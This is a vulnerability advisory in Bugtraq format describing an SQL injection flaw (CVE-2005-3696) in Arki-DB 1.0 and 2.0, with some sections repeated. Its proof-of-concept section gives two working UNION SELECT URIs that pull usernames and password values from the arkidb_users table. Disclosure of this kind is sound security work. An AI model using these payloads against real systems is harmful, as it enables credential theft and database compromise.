Arki-DB Index.PHP SQL Injection Vulnerability
BID:15467
Info
Arki-DB Index.PHP SQL Injection Vulnerability
| Bugtraq ID: | 15467 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-3696 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 16 2005 12:00AM |
| Updated: | Jul 12 2009 05:56PM |
| Credit: | Devil-00 <[email protected]> is credited with the discovery of this vulnerability. |
| Vulnerable: |
Arki-DB Arki-DB 2.0 Arki-DB Arki-DB 1.0 |
| Not Vulnerable: | |
Discussion
Arki-DB Index.PHP SQL Injection Vulnerability
Arki-DB is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Arki-DB is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Exploit / POC
Arki-DB Index.PHP SQL Injection Vulnerability
No exploit is required.
The following proof of concept URI are available:
http://www.example.com/index.php?action=view&view=category&catid=-1%20UNION%20SELECT%20null,null,username,null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&catflag=1&sublevel=1
http://www.example.com/index.php?action=view&view=category&catid=-1%20UNION%20SELECT%20null,null,userpass,null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&catflag=1&sublevel=1
No exploit is required.
The following proof of concept URI are available:
http://www.example.com/index.php?action=view&view=category&catid=-1%20UNION%20SELECT%20null,null,username,null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&catflag=1&sublevel=1
http://www.example.com/index.php?action=view&view=category&catid=-1%20UNION%20SELECT%20null,null,userpass,null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&catflag=1&sublevel=1
Solution / Fix
Arki-DB Index.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.